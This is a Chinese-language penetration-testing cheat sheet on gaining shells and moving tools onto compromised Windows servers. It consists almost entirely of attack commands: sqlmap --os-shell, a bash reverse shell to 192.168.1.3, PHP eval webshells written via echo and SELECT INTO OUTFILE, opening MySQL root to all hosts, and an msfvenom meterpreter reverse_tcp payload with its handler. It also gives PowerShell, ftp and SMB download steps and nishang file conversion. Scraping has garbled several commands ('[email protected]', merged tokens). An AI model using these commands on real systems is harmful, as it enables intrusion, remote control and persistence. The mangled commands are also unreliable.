获得shell的几种姿势

windows提权

1.通过sqlmap连接mysql获取shell

（1）直接连接数据库

sqlmap.py -d “mysql://root:[email?protected]:3306/mysql”–os-shell

（2）通过选择32位或者64位操作系统，获取webshell，执行

bash -i >& /dev/tcp/192.168.1.3/80800>&1

（3）反弹到服务器192.168.1.3，在实际中192.168.1.3为外网独立IP。

（4）通过echo命令生成shell：

echo “[email?protected]($_POST['chopper']);?” >/data/www/phpmyadmin/1.php

如果能够通过phpmyadmin管理数据库，则可以修改host为“%”并执行权限更新，下面命令可参考：

use mysql;

update userset host = ‘%’ where user = ‘root’;

FLUSHPRIVILEGES ;

注意：如果数据库中有多个host连接，修改时可能会导致数据库连接出问题。

2.通过msf反弹

（1）使用msfvenom生成msf反弹的php脚本木马，默认端口为4444：

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.1.3 -f raw > test.php

（2）在独立IP或者反弹服务器上运行msf依次执行以下命令：

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.1.3  //192.168.1.3为反弹监听服务器IP

show options

run 0 或者exploit

（3）上传并执行php文件

将test.php上传到192.168.1.2服务器上面，访问后即可获取msf反弹shell

http:// 192.168.1.2:8080/test.php

3.通过phpmyadmin管理界面查询生成webshll

select ‘<?php @eval($_POST[cmd]);?>’INTOOUTFILE ‘D:/work/WWW/antian365.php’

我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器，而且不能上传shell，唯一的入口就是命令执行，这种情况下，我们需要向服务器上传一个大一点的工具，如何实现，这就是本文章主要的内容。

利用http协议下载文件

利用vbs下载

将下面的代码保存为test.vbs

执行如下语句：

cscript test.vbs

利用powershell下载

将如下代码保存为test.ps1

$p = New-Object System.Net.WebClient$p.DownloadFile("http://domain/file" "C:%homepath%file")

执行.test.ps1

有的时候PowerShell的执行权限会被关闭，需要使用如下的语句打开。

powershell set-executionpolicy unrestricted

利用ftp协议下载文件

1 创建一个ftp服务器，或者使用公共的ftp服务器

2 将下面的代码保存为test.txt

ftp 127.0.0.1
username
password
get fileexit

3 执行下面的命令

ftp -s:test.txt

利用smb协议拷贝文件

1 在公网创建一个共享如：111.111.111.111test$

2 命令行下执行net use 111.111.111.111test$ /u:test test

3 最后上传文件到共享，命令行下拷贝：copy 111.111.111.111test$test.exe c:

利用echo直接写文件

使用nishang的powershell工具包对上传的文件进行处理，然后使用echo到文件中，最后再转为原始文件。

下载地址：https://github.com/samratashok/nishang

具体操作步骤：

1 将文件转为hex

PS > .ExetoText.ps1 evil.exe evil.txt

2 将hex的值echo到文件中

3 将hex转为原始文件

PS > .TexttoExe.ps1 evil.text evil.exe

总结

这几种方式的利用场景是在我们发现一个服务器存在命令执行，而且还是一台Windows，在不依赖其他工具的前提下，使用Windows自带的命令将我们需要的工具上传到服务器的姿势。以上的脚本文件都可以使用echo 的方式保存到服务器上，然后再利用这些姿势上传大一点的工具等文件。欢迎大家补充各种姿势。